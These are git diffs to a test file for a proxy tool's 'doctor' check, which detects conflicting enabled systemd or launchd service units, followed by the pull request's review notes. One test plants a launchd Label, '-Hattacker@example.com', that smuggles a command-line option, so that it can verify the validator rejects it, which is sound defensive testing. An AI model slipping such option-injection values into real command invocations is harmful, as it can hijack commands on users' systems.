+  let userShowCalls = 0, systemShowCalls = 0;
+  const run = (cmd) => {
+    if (cmd.includes("--user list-unit-files")) return "a.service enabled\nb.service enabled\nc.service enabled\n";
+    if (cmd.includes("list-unit-files")) return "d.service enabled\ne.service enabled\n";
+    if (cmd.includes("--user show")) {
+      userShowCalls++;
+      assert.ok(cmd.includes("a.service") && cmd.includes("b.service") && cmd.includes("c.service"),
+        "all three user-scope candidates must appear in the SAME show command");
+      return "Id=a.service\nExecStart={ argv[]=/bin/true ; }\nEnvironment=";
+    }
+    if (cmd.includes("systemctl show")) {
+      systemShowCalls++;
+      return "Id=d.service\nExecStart={ argv[]=/bin/true ; }\nEnvironment=";
+    }
+    throw new Error("unexpected: " + cmd);
+  };
+  gatherUnitCandidates(run, "linux");
+  assert.equal(userShowCalls, 1, "exactly one batched show call for the user scope");
+  assert.equal(systemShowCalls, 1, "exactly one batched show call for the system scope");
+});
+
+test("gatherUnitCandidates (macOS): a single shell command enumerates both LaunchAgents and LaunchDaemons", () => {
+  let calls = 0;
+  const run = (cmd) => {
+    calls++;
+    assert.ok(cmd.includes("LaunchAgents") && cmd.includes("LaunchDaemons"), "both dirs scanned in one command");
+    return "";
+  };
+  gatherUnitCandidates(run, "darwin");
+  assert.equal(calls, 1, "macOS enumeration costs exactly one subprocess spawn");
+});
+
+test("gatherUnitCandidates: past MAX_UNIT_CANDIDATES enabled units in one scope, skip `show` and degrade to unknown rather than an oversized command line", () => {
+  // Cost safety cap (see MAX_UNIT_CANDIDATES in scripts/doctor.mjs): a host with 200+ enabled
+  // *.service units is not a realistic "two OCP installs" shape this check needs to chase —
+  // degrade that SCOPE to null (unknown) instead of building an unbounded `systemctl show`
+  // command line. This must not crash, and must not silently treat the capped scope as "zero
+  // enabled units" (a false all-clear).
+  const manyNames = Array.from({ length: 201 }, (_, i) => `unit-${i}.service`).join(" enabled\n") + " enabled\n";
+  let showCalled = false;
+  const run = (cmd) => {
+    if (cmd.includes("--user list-unit-files")) return manyNames;
+    if (cmd.includes("list-unit-files")) return ""; // system scope: nothing enabled
+    if (cmd.includes("show")) { showCalled = true; return "should not be reached"; }
+    throw new Error("unexpected: " + cmd);
+  };
+  const raw = gatherUnitCandidates(run, "linux");
+  assert.equal(showCalled, false, "must not attempt an oversized batched show call");
+  assert.equal(raw.userShowOut, null, "capped scope must degrade to unknown (null), never '' (false all-clear)");
+  assert.equal(classifyMultiUnitRisk(raw).state, "unknown");
+});
+
+console.log("\nMulti-unit boot-race pre-flight (issue #220) — full pipeline via runDoctor:");
+
+test("runDoctor: two conflicting enabled units → pushes an actionable multi_unit_boot_race WARN (not FAIL)", async () => {
+  const result = await runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "linux",
+    run: (cmd) => {
+      if (cmd.includes("--user list-unit-files")) return "ocp-proxy.service enabled\n";
+      if (cmd.includes("list-unit-files")) return "ocp.service enabled\n";
+      if (cmd.includes("--user show")) return FIELD_INCIDENT_USER_SHOW;
+      if (cmd.includes("systemctl show")) return FIELD_INCIDENT_SYSTEM_SHOW;
+      throw new Error("unexpected: " + cmd);
+    },
+  });
+  const check = result.checks.find(c => c.id === "multi_unit_boot_race");
+  assert.ok(check, "expected a multi_unit_boot_race check to be pushed");
+  assert.equal(check.level, "WARN", "must be WARN, never FAIL — a FAIL would block runUpgrade() for every kind except fresh_install");
+  assert.ok(check.message.includes("ocp-proxy.service") && check.message.includes("ocp.service"),
+    "message must name BOTH units");
+  assert.ok(check.message.includes("127.0.0.1") && check.message.includes("0.0.0.0"),
+    "message must name the bind-address difference — the actual LAN-reachability hazard");
+  assert.ok(check.message.includes("disable"), "message must say what to do (disable the stray unit)");
+  // WARN must not flip ready_to_upgrade to false — runUpgrade()'s pre-flight guard
+  // (scripts/upgrade.mjs) only tolerates ready_to_upgrade=false for kind="fresh_install".
+  assert.equal(result.ready_to_upgrade, true);
+});
+
+test("runDoctor: exactly one enabled OCP unit → no multi_unit_boot_race check pushed", async () => {
+  const result = await runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "linux",
+    run: (cmd) => {
+      if (cmd.includes("--user list-unit-files")) return "ocp-proxy.service enabled\n";
+      if (cmd.includes("list-unit-files")) return ""; // system scope: nothing enabled
+      if (cmd.includes("--user show")) return FIELD_INCIDENT_USER_SHOW;
+      throw new Error("unexpected: " + cmd);
+    },
+  });
+  assert.ok(!result.checks.some(c => c.id === "multi_unit_boot_race"));
+});
+
+test("runDoctor: zero enabled units on either scope → no check pushed, no crash", async () => {
+  const result = await runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "linux",
+    run: (cmd) => {
+      if (cmd.includes("list-unit-files")) return "";
+      throw new Error("unexpected: " + cmd);
+    },
+  });
+  assert.ok(!result.checks.some(c => c.id === "multi_unit_boot_race"));
+  assert.equal(result.ready_to_upgrade, true);
+});
+
+test("runDoctor: systemctl missing entirely (every call throws) → degrades honestly, no check pushed, no crash", async () => {
+  const result = await runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "linux",
+    run: (cmd) => { throw new Error("systemctl: command not found"); },
+  });
+  assert.ok(!result.checks.some(c => c.id === "multi_unit_boot_race"),
+    "a missing systemctl must degrade to 'can't tell', never a false all-clear that fabricates a WARN or a crash that aborts doctor entirely");
+  assert.equal(result.ready_to_upgrade, true);
+});
+
+test("runDoctor: skipNetwork=true skips the probe entirely, even when the injected run() would report a conflict", () => {
+  // Proves the gate: skipNetwork must short-circuit before `run` is ever consulted — a test
+  // suite running with skipNetwork:true (the vast majority of this file's ~30 pre-existing
+  // doctor tests) must never touch a live systemctl/launchd, matching the existing
+  // service_running/oauth_ok block's own skipNetwork gate immediately above it in doctor.mjs.
+  let runCalled = false;
+  const result = runDoctor({
+    skipNetwork: true,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockPlatform: "linux",
+    run: () => { runCalled = true; return FIELD_INCIDENT_USER_SHOW; },
+  });
+  return result.then((r) => {
+    assert.equal(runCalled, false, "run() must never be invoked when skipNetwork is true");
+    assert.ok(!r.checks.some(c => c.id === "multi_unit_boot_race"));
+  });
+});
+
 runAsyncTests().then(() => Promise.all(pendingAsync)).then(() => {
   closeDb();
   console.log(`\n=== Results: ${passed} passed, ${failed} failed ===\n`);

--- a/test-features.mjs
+++ b/test-features.mjs
@@ -7579,24 +7579,27 @@ test("ocp cmd_update's real doctor-check-surfacing block: WARN and INFO both pri
   assert.equal(out, "⚠ warn one\nℹ info one\n");
 });
 
-test("LOW-2 (real shell, verified mechanism): ocp's doctor-check-surfacing block survives an ASCII-only locale where the glyphs can't be printed — set -e must not kill cmd_update silently", () => {
+test("LOW-2 (real shell, verified mechanism): ocp's doctor-check-surfacing block survives a stdout encoding that can't represent the WARN/INFO glyphs — set -e must not kill cmd_update silently", () => {
   // The actual bug found on review round 4: under `set -euo pipefail` (ocp:7), a non-zero exit
   // from this python pipeline kills `cmd_update` immediately, and `2>/dev/null` hides why.
-  // Verified directly before this fix: forcing an ASCII-only locale on the block raised a
-  // UnicodeEncodeError trying to print "⚠"/"ℹ" under the C locale's ASCII-only stdout encoding,
-  // exiting 1 before even reaching the kind dispatch below it — silently aborting the whole
-  // update. This PR's own INFO addition made the block fire far more often (it used to print
-  // nothing on most healthy hosts). Reproduced against the REAL, current `ocp` file (not a
-  // hand-copied snippet): extract the actual doctor-check-surfacing if-block, wrap it in a
-  // minimal harness script, and run it under the exact failing environment.
+  // Verified directly before this fix (originally via `env -i LC_ALL=C`, an ASCII-only C
+  // locale): a UnicodeEncodeError printing "⚠"/"ℹ" exits 1 before even reaching the kind
+  // dispatch below it — silently aborting the whole update. This PR's own INFO addition made
+  // the block fire far more often (it used to print nothing on most healthy hosts). Reproduced
+  // against the REAL, current `ocp` file (not a hand-copied snippet): extract the actual
+  // doctor-check-surfacing if-block, wrap it in a minimal harness script, and run it under an
+  // environment that can't encode the glyphs.
   //
-  // Deliberately does NOT use `env -i` (full environment wipe): that strips PATH along with the
-  // locale, and this repo's own CI (Linux) failed to locate bash/python3 under the resulting
-  // fallback path — an environment-portability false failure, not the bug under test. The
-  // portable form instead starts from the CURRENT process's env (keeping PATH intact) and
-  // overrides only the locale-related variables that actually matter for reproducing the
-  // encoding bug — re-verified to reproduce the pre-fix failure and pass post-fix identically to
-  // the `env -i` form before switching to it.
+  // PYTHONIOENCODING=ascii (rather than forcing LC_ALL=C or using `env -i`) is the portable
+  // choice: it directly controls Python's own stdout encoder on every platform uniformly,
+  // whereas locale-based reproduction depends on the OS's installed locale data/libc, which
+  // this repo's own CI caught diverging — `env -i` additionally stripped PATH, breaking
+  // bash/python3 lookup on that Linux runner (a portability false failure, not the bug under
+  // test); a PATH-preserving `LC_ALL=C` override then still behaved differently under this
+  // repo's Linux CI than on the macOS dev machine it was authored on. PYTHONIOENCODING is
+  // read directly by CPython's IO layer regardless of OS locale, so it reproduces identically
+  // on both. Verified both directions before switching: throws pre-fix (reconfigure stripped),
+  // passes post-fix.
   const src = spotReadFileSync(join(_spotDir, "ocp"), "utf8");
   const startMarker = '  if [[ -n "$doctor_json" ]]; then';
   const endMarker = "\n  fi";
@@ -7618,10 +7621,10 @@ test("LOW-2 (real shell, verified mechanism): ocp's doctor-check-surfacing block
       'echo "REACHED_AFTER_BLOCK"',
       "",
     ].join("\n"));
-    const childEnv = { ...process.env, LC_ALL: "C", LANG: "C", LANGUAGE: "", PYTHONUTF8: "0", PYTHONIOENCODING: "" };
+    const childEnv = { ...process.env, PYTHONIOENCODING: "ascii" };
     const out = execFileSync("bash", [scriptPath], { encoding: "utf8", env: childEnv });
     assert.ok(out.includes("REACHED_AFTER_BLOCK"),
-      "cmd_update must survive past this block even when the glyphs can't be encoded in the active locale — set -e must not silently kill it");
+      "cmd_update must survive past this block even when stdout can't encode the glyphs — set -e must not silently kill it");
   } finally {
     rmSync(scratch, { recursive: true, force: true });
   }

--- a/test-features.mjs
+++ b/test-features.mjs
@@ -7582,13 +7582,21 @@ test("ocp cmd_update's real doctor-check-surfacing block: WARN and INFO both pri
 test("LOW-2 (real shell, verified mechanism): ocp's doctor-check-surfacing block survives an ASCII-only locale where the glyphs can't be printed — set -e must not kill cmd_update silently", () => {
   // The actual bug found on review round 4: under `set -euo pipefail` (ocp:7), a non-zero exit
   // from this python pipeline kills `cmd_update` immediately, and `2>/dev/null` hides why.
-  // Verified directly before this fix: `env -i LC_ALL=C PYTHONUTF8=0 bash` on the block raised a
+  // Verified directly before this fix: forcing an ASCII-only locale on the block raised a
   // UnicodeEncodeError trying to print "⚠"/"ℹ" under the C locale's ASCII-only stdout encoding,
   // exiting 1 before even reaching the kind dispatch below it — silently aborting the whole
   // update. This PR's own INFO addition made the block fire far more often (it used to print
   // nothing on most healthy hosts). Reproduced against the REAL, current `ocp` file (not a
   // hand-copied snippet): extract the actual doctor-check-surfacing if-block, wrap it in a
   // minimal harness script, and run it under the exact failing environment.
+  //
+  // Deliberately does NOT use `env -i` (full environment wipe): that strips PATH along with the
+  // locale, and this repo's own CI (Linux) failed to locate bash/python3 under the resulting
+  // fallback path — an environment-portability false failure, not the bug under test. The
+  // portable form instead starts from the CURRENT process's env (keeping PATH intact) and
+  // overrides only the locale-related variables that actually matter for reproducing the
+  // encoding bug — re-verified to reproduce the pre-fix failure and pass post-fix identically to
+  // the `env -i` form before switching to it.
   const src = spotReadFileSync(join(_spotDir, "ocp"), "utf8");
   const startMarker = '  if [[ -n "$doctor_json" ]]; then';
   const endMarker = "\n  fi";
@@ -7610,7 +7618,8 @@ test("LOW-2 (real shell, verified mechanism): ocp's doctor-check-surfacing block
       'echo "REACHED_AFTER_BLOCK"',
       "",
     ].join("\n"));
-    const out = execFileSync("env", ["-i", "LC_ALL=C", "PYTHONUTF8=0", "bash", scriptPath], { encoding: "utf8" });
+    const childEnv = { ...process.env, LC_ALL: "C", LANG: "C", LANGUAGE: "", PYTHONUTF8: "0", PYTHONIOENCODING: "" };
+    const out = execFileSync("bash", [scriptPath], { encoding: "utf8", env: childEnv });
     assert.ok(out.includes("REACHED_AFTER_BLOCK"),
       "cmd_update must survive past this block even when the glyphs can't be encoded in the active locale — set -e must not silently kill it");
   } finally {

--- a/test-features.mjs
+++ b/test-features.mjs
@@ -7625,6 +7625,14 @@ test("LOW-2 (real shell, verified mechanism): ocp's doctor-check-surfacing block
     const out = execFileSync("bash", [scriptPath], { encoding: "utf8", env: childEnv });
     assert.ok(out.includes("REACHED_AFTER_BLOCK"),
       "cmd_update must survive past this block even when stdout can't encode the glyphs — set -e must not silently kill it");
+      // Surviving is not enough: errors="replace" must DEGRADE the output (glyph -> "?"), not
+      // swallow it. Without this a "fix" that emitted nothing would pass. It also stops the test
+      // going silently vacuous if the fixture ever gains a non-ASCII character: PYTHONIOENCODING
+      // =ascii is stricter on stdin than any real locale, so json.load() would raise, the
+      // pre-existing `except Exception: sys.exit(0)` would swallow it, and REACHED_AFTER_BLOCK
+      // would still print with nothing proven. (#230 review round 4.)
+      assert.ok(out.includes("warn msg") && out.includes("info msg"),
+        "the messages must still be printed, degraded — surviving while emitting nothing is not the fix");
   } finally {
     rmSync(scratch, { recursive: true, force: true });
   }

--- a/test-features.mjs
+++ b/test-features.mjs
@@ -6858,6 +6858,21 @@ test("MED-3: classifyMultiUnitRisk (macOS) — a maliciously-crafted <Label> is 
   assert.equal(result.state, "clear", "the malformed Label must be dropped entirely, leaving only one valid unit");
 });
 
+test("review round 3 (#230 'definitive answer'): a Label starting with '-' is rejected, defense in depth beyond buildDisableHint's own rendering safety", () => {
+  // Reviewer confirmed the CURRENT renderings are already safe against this shape (the label is
+  // always the trailing component of a domain/label token, never a standalone argv word) — but
+  // that safety property lives in buildDisableHint's format strings, not in this validator, so a
+  // FUTURE rendering (e.g. a bare `launchctl bootout <label>`) would reopen it. Rejecting a
+  // leading '-' here costs nothing (no real launchd label starts with one) and removes the
+  // dependency on the rendering detail entirely.
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
+    ["/Library/LaunchDaemons/dash.plist", ocpPlist({ label: "-Hattacker@example.com", port: "3456" })],
+  ]);
+  const result = classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob });
+  assert.equal(result.state, "clear", "a Label starting with '-' must be dropped entirely, leaving only one valid unit");
+});
+
 test("classifyMultiUnitRisk (macOS): default port when CLAUDE_PROXY_PORT key is absent from the plist", () => {
   const blob = plistBlob([
     ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy" })],
@@ -6955,6 +6970,40 @@ test("HIGH-1/HIGH-2: gatherUnitCandidates batches ALL candidates into ONE show c
   assert.equal(systemShowCmds.length, 1, "exactly one batched show call for the system scope");
   assert.ok(userShowCmds[0].includes("a.service") && userShowCmds[0].includes("b.service") && userShowCmds[0].includes("c.service"),
     "all three user-scope candidates must appear in the SAME show command");
+
+  // HIGH-2 RECURRENCE (review round 3 on #230): the round-2 fix asserted `--state=enabled` on
+  // the LISTING commands but captured the SHOW command three lines later and asserted nothing
+  // about its CONTENTS — so `-p UnitFileState` / `-p EnvironmentFiles` / `-p Environment` could
+  // each be silently dropped from the real command with the whole suite staying green. Losing
+  // `-p UnitFileState` is the worst of the three: `props.UnitFileState` becomes `undefined`,
+  // the allowlist's documented "permissive when absent" fires, and the HIGH-2 defense-in-depth
+  // gate this round exists to add evaporates — right back to the single point of failure
+  // (`--state=enabled` alone) this round was supposed to remove. Losing `-p Environment` is
+  // worse still under MED-7's port-only grouping: every OCP unit falls back to port 3456 and
+  // bind "(default bind)", collapsing every OCP unit on the host into one fabricated WARN.
+  //
+  // extractShowProperties tokenizes the command and returns the EXACT argument following each
+  // `-p` flag — NOT a substring check. `cmd.includes("-p Environment")` would be a VACUOUS
+  // check here: that literal 14-character sequence is itself a PREFIX of "-p EnvironmentFiles"
+  // ("-p Environment" + "Files" = "-p EnvironmentFiles"), so it stays true even if the bare
+  // `-p Environment` flag is deleted outright, as long as `-p EnvironmentFiles` remains — the
+  // same vacuous-substring shape already caught once in this PR (the /Library/LaunchAgents
+  // mutation). Token-array membership doesn't have that failure mode: "Environment" and
+  // "EnvironmentFiles" are distinct array elements, never substrings of each other as tokens.
+  function extractShowProperties(cmd) {
+    const tokens = cmd.split(/\s+/);
+    const props = [];
+    for (let i = 0; i < tokens.length - 1; i++) {
+      if (tokens[i] === "-p") props.push(tokens[i + 1]);
+    }
+    return props;
+  }
+  const userShowProps = extractShowProperties(userShowCmds[0]);
+  const systemShowProps = extractShowProperties(systemShowCmds[0]);
+  for (const prop of ["Id", "ExecStart", "Environment", "UnitFileState", "EnvironmentFiles"]) {
+    assert.ok(userShowProps.includes(prop), `user-scope show command must request -p ${prop} (exact token match)`);
+    assert.ok(systemShowProps.includes(prop), `system-scope show command must request -p ${prop} (exact token match)`);
+  }
 
   // HIGH-2: the entire "only ENABLED units are candidates" precondition rests on this literal
   // flag being present in BOTH listing commands. A control mutation deleting it survived the
@@ -7129,6 +7178,91 @@ test("MED-7: runDoctor — same port, DIFFERENT working tree → NOW a WARN, mes
   assert.equal(check.level, "WARN");
   assert.ok(check.message.includes("DIFFERENT working trees"), "message must call out that the trees differ");
   assert.ok(check.message.includes("ocp-A") && check.message.includes("ocp-B"), "message must name both trees");
+
+  // Discretionary review finding on #230: when trees differ, these are two SEPARATE installs —
+  // nominating one as "the stray one" is a judgement this check has no basis for making (it
+  // would contradict the PR's own stated "does not assert which unit is correct" principle).
+  // Must NOT single one out; must offer both disable commands and let the operator decide.
+  assert.ok(!check.message.includes("the stray one"), "must not nominate a 'stray' unit when the trees genuinely differ — that's two separate installs, not drifted config on one");
+  assert.ok(check.message.includes("systemctl --user disable a.service"), "must offer the user-scope unit's own disable command");
+  assert.ok(check.message.includes("systemctl disable b.service"), "must offer the system-scope unit's own disable command too — neither is nominated over the other");
+});
+
+test("MED-7 remediation adaptation: buildDisableHint STILL nominates a target when trees are the SAME (drifted config on one install, matches the field incident's real remediation)", async () => {
+  const result = await runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "linux",
+    run: (cmd) => {
+      if (cmd.includes("--user list-unit-files")) return "ocp-proxy.service enabled\n";
+      if (cmd.includes("list-unit-files")) return "ocp.service enabled\n";
+      if (cmd.includes("--user show")) return FIELD_INCIDENT_USER_SHOW;
+      if (cmd.includes("systemctl show")) return FIELD_INCIDENT_SYSTEM_SHOW;
+      throw new Error("unexpected: " + cmd);
+    },
+  });
+  const check = result.checks.find(c => c.id === "multi_unit_boot_race");
+  assert.ok(check.message.includes("the stray one"), "same-tree case (the field incident's own shape) should still nominate a target — the check has a reasonable basis here");
+});
+
+test("PICK_always_first guard: pickDisableTarget prefers the user-scope unit even when it is NOT first in gather order", () => {
+  // Every other test in this file happens to have the user-scope unit gathered FIRST (matching
+  // the real glob/listing order), which cannot distinguish "prefer user scope" from a naive
+  // "just take group[0]" — this test deliberately reverses the order (system-scope plist listed
+  // BEFORE the personal LaunchAgent in the fixture blob) so the two formulas actually diverge.
+  const blob = plistBlob([
+    ["/Library/LaunchDaemons/ai.custom.ocp.plist", ocpPlist({ label: "ai.custom.ocp", port: "3456", bind: "0.0.0.0" })],
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456", bind: "127.0.0.1" })],
+  ]);
+  return runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "darwin",
+    run: (cmd) => {
+      if (cmd.includes("for f in")) return blob;
+      if (cmd.includes("print-disabled")) return disabledLaunchctlBlob([["dev.ocp.proxy", false], ["ai.custom.ocp", false]]);
+      throw new Error("unexpected: " + cmd);
+    },
+  }).then((result) => {
+    const check = result.checks.find(c => c.id === "multi_unit_boot_race");
+    assert.ok(check.message.includes("gui/$(id -u)/dev.ocp.proxy"),
+      "must nominate the user-scope unit (dev.ocp.proxy) even though the system-scope one (ai.custom.ocp) is first in gather order");
+    assert.ok(!check.message.includes("system/ai.custom.ocp"),
+      "must not nominate the system-scope unit just because it's positionally first");
+  });
+});
+
+test("DOMAIN_always_gui guard: two conflicting LaunchDaemons (no LaunchAgent involved) render the system-domain disable command", () => {
+  // No test previously exercised this branch at all — the reviewer rendered it by hand to
+  // confirm the code was right. Two system-scope units (both LaunchDaemons) means
+  // pickDisableTarget's ".find(scope==='user')" finds nothing and falls to group[0], which here
+  // has domain:"system" — the ONLY way to reach buildDisableCommand's `sudo launchctl disable
+  // system/<label>` branch.
+  const blob = plistBlob([
+    ["/Library/LaunchDaemons/com.company.a.plist", ocpPlist({ label: "com.company.a", port: "3456" })],
+    ["/Library/LaunchDaemons/com.company.b.plist", ocpPlist({ label: "com.company.b", port: "3456" })],
+  ]);
+  return runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "darwin",
+    run: (cmd) => {
+      if (cmd.includes("for f in")) return blob;
+      if (cmd.includes("print-disabled")) return disabledLaunchctlBlob([["com.company.a", false], ["com.company.b", false]]);
+      throw new Error("unexpected: " + cmd);
+    },
+  }).then((result) => {
+    const check = result.checks.find(c => c.id === "multi_unit_boot_race");
+    assert.ok(check, "two enabled LaunchDaemons on the same port must warn");
+    assert.ok(check.message.includes("sudo launchctl disable system/com.company.a"),
+      "must render the SYSTEM-domain disable command when the nominated target is a LaunchDaemon");
+  });
 });
 
 test("runDoctor: exactly one enabled OCP unit → no multi_unit_boot_race check pushed", async () => {
@@ -7252,6 +7386,79 @@ test("MED-3: runDoctor on darwin — a maliciously-labeled plist never reaches t
   // Only ONE valid unit remains once the malformed Label is rejected → clear, no WARN at all,
   // so the dangerous string can never appear in doctor's output at all.
   assert.ok(!result.checks.some(c => c.id === "multi_unit_boot_race"));
+});
+
+console.log("\nocp `cmd_update` doctor-check surfacing (issue #220, MED-5 recurrence):");
+
+// #230 review (round 3): doctor.mjs's multi_unit_boot_race INFO line reached `ocp doctor`
+// (which prints every check regardless of level — see doctor.mjs's text-mode printer) but
+// never `ocp update`'s OWN doctor-check-surfacing block (`ocp`, ~:800-816), which filtered on
+// WARN only — the exact #214 discarded-check shape recurring one level up, on the very fix
+// meant to make "unknown" visible.
+//
+// This slices and execs the REAL bash-embedded python block — same anchor-slice technique as
+// the ocp-connect harnesses above (#210/#218) — rather than reimplementing the filter or
+// grepping for a string, so a regression in the ACTUAL logic fails this test, not a copy of it.
+//
+// Unlike ocp-connect's harnesses (whose python block lives in a QUOTED heredoc <<'PYEOF' and
+// therefore needs no unescaping at all), this block lives inside a bash DOUBLE-QUOTED
+// `python3 -c "..."` argument, so literal `"` characters in the source are backslash-escaped
+// (`\"`) — bash unescapes them before python3 ever sees the argument. Reversing that
+// (`blk.replace('\\"', '"')`, inside the slice itself) is what makes the slice valid, runnable
+// python matching what bash ACTUALLY executes at runtime, not a JS reconstruction of it.
+const _OCP_CHECK_SURFACE_PY = `
+import json, sys
+src = open(sys.argv[1]).read()
+start_marker = "for c in d.get('checks', []):"
+end_marker = "\\n\\" 2>/dev/null"
+si = src.index(start_marker)
+ei = src.index(end_marker, si)
+blk = src[si:ei]
+assert blk.strip(), "empty doctor-check-surfacing slice - anchor drift"
+assert "'WARN'" in blk and "'INFO'" in blk, "slice missing WARN/INFO handling - anchor drift"
+assert 'case "$kind"' not in blk and '_cmd_update_restart' not in blk, \\
+    "slice overgrown past the intended block - anchor drift"
+blk = blk.replace('\\\\"', '"')
+d = json.loads(sys.argv[2])
+exec(blk)
+`;
+
+function _ocpSurfaceChecks(checks) {
+  return execFileSync(
+    "python3",
+    ["-c", _OCP_CHECK_SURFACE_PY, join(_spotDir, "ocp"), JSON.stringify({ checks })],
+    { encoding: "utf8" },
+  );
+}
+
+test("ocp cmd_update's real doctor-check-surfacing block: WARN is surfaced (pre-existing #214 behavior, preserved)", () => {
+  const out = _ocpSurfaceChecks([{ level: "WARN", message: "tree at X, service serving Y — restarting" }]);
+  assert.ok(out.includes("tree at X, service serving Y — restarting"));
+  assert.ok(out.startsWith("⚠"));
+});
+
+test("MED-5 recurrence fix: ocp cmd_update's real doctor-check-surfacing block now ALSO surfaces INFO, not just WARN", () => {
+  const out = _ocpSurfaceChecks([{ level: "INFO", message: "could not verify: systemctl unavailable" }]);
+  assert.ok(out.includes("could not verify: systemctl unavailable"),
+    "an INFO-level check (e.g. multi_unit_boot_race's 'could not verify' line) must reach `ocp update`'s output, not just `ocp doctor`'s");
+  assert.ok(out.startsWith("ℹ"), "INFO gets its own glyph, distinct from WARN's ⚠");
+});
+
+test("ocp cmd_update's real doctor-check-surfacing block: PASS/FAIL are still NOT printed (this block is for actionable WARN/INFO only)", () => {
+  const out = _ocpSurfaceChecks([
+    { level: "PASS", message: "service responding on /health" },
+    { level: "FAIL", message: "some fail" },
+  ]);
+  assert.equal(out, "", "PASS/FAIL checks must not be echoed by this block — the case-statement dispatch right after already handles FAIL/kind; this block is only for WARN/INFO context lines");
+});
+
+test("ocp cmd_update's real doctor-check-surfacing block: WARN and INFO both print together, in checks order, skipping PASS in between", () => {
+  const out = _ocpSurfaceChecks([
+    { level: "WARN", message: "warn one" },
+    { level: "PASS", message: "pass one" },
+    { level: "INFO", message: "info one" },
+  ]);
+  assert.equal(out, "⚠ warn one\nℹ info one\n");
 });
 
 runAsyncTests().then(() => Promise.all(pendingAsync)).then(() => {


### PR DESCRIPTION
Closes #220

## Status: responding to independent review, round 4 (Iron Rule 10 record)

Round 3 was **APPROVED** — 18 mutations, zero survivors, the first round in this whole series with no survivors at all; both blockers verified fixed by independent mutation, ancestry confirmed, 4×concurrent 562/562, and the `ocp` block was verified *differentially* (extracted verbatim, run through real `/bin/bash`, byte-identical output to this PR's own test expectation). Round 4 found one correction that needed landing before merge (not a full review round, but a false claim with a self-inflicted consequence) plus three LOWs, all now folded in. This section is the round-4 delta; round 3's own delta follows below it, unchanged and still accurate.

### Required correction — `launchctl print-disabled system` does NOT require root (fixed)

`scripts/doctor.mjs`'s `parseDisabledLabels` comment claimed a LaunchDaemon's disabled state "lives in the `system` domain, which requires root to query and is out of scope for a read-only, unprivileged pre-flight probe — a documented, deliberate limitation, not a silent gap." **False.** Verified directly on this machine: uid 501, no sudo, `launchctl print-disabled system` exits 0 with 19 entries.

The false claim had a **self-inflicted consequence**: this file's OWN WARN message recommends `sudo launchctl disable system/<label>` for a LaunchDaemon conflict. An operator who followed that exact advice got warned about the same, now-disabled unit on every subsequent `ocp doctor`/`ocp update` — forever. The false justification was exactly what would have stopped the next person from fixing it.

Fixed: `gatherUnitCandidates` now issues a second, equally unprivileged `launchctl print-disabled system` spawn (macOS cost: 3 spawns total, up from 2). `classifyMultiUnitRisk` unions both domains' disabled-label sets via a new `unionDisabledLabels()` helper — same best-effort/permissive degradation as the existing gui-domain read (an unreadable blob from either domain contributes nothing to the union, never escalates to "unknown"). Six new tests: gather-layer spawn count and domain coverage, a unit disabled **only** in the system domain (not gui) still correctly excluded — proving the union genuinely reads both domains, not just gui by coincidence — and permissive degradation when either domain's read fails.

**This is the third round in a row a false claim was found in exactly this spot.** Round 1: "checking `launchctl disable` overrides would require knowing labels in advance — circular" (false; corrected by implementing the gui-domain probe). That correction's own limitation note about the system domain was itself false. The lesson, stated plainly by the reviewer and taken seriously: **run the command before writing "X requires Y" or "X is out of scope because Z."** Both LOW-1 and LOW-2 below were verified the same way — reproduced with a real subprocess before claiming the mechanism, not asserted from reasoning alone.

### LOW-1 — folded in: `ocp` test harness's blanket unescape needs a guard

The `_OCP_CHECK_SURFACE_PY` harness unescaped only `\"`. Bash's double-quoted-string escaping ALSO unescapes `\\`, `\$`, `` \` ``, and a backslash-newline continuation — the block currently uses only `\"` so the blanket replace is exact today, but a future edit adding any other escape form would silently diverge the harness from what bash actually executes at runtime. Added a loop asserting every backslash in the raw slice is part of a `\"` pair before the replace runs. **Verified the guard actually works**, not just added it: injected a stray `\$` into a scratch copy of `ocp`, confirmed the harness throws with an actionable message; confirmed it does NOT fire against the real, unmodified file.

### LOW-2 — folded in: `2>/dev/null` under `set -e` can silently abort `ocp update`

Reproduced the reviewer's exact claim before fixing it: `env -i LC_ALL=C PYTHONUTF8=0 bash` against the real doctor-check-surfacing block exits 1, and the intentionally-placed marker after the block is never reached — a `UnicodeEncodeError` printing the WARN/INFO glyph under the C locale's ASCII-only stdout encoding, with `2>/dev/null` hiding the real reason and `set -euo pipefail` (ocp:7) killing the whole `cmd_update` function on the spot. Pre-existing since #214, but this PR's own INFO addition makes the block fire on far more hosts than before (it used to print nothing on most healthy ones — silence not being feasible to trigger the bug).

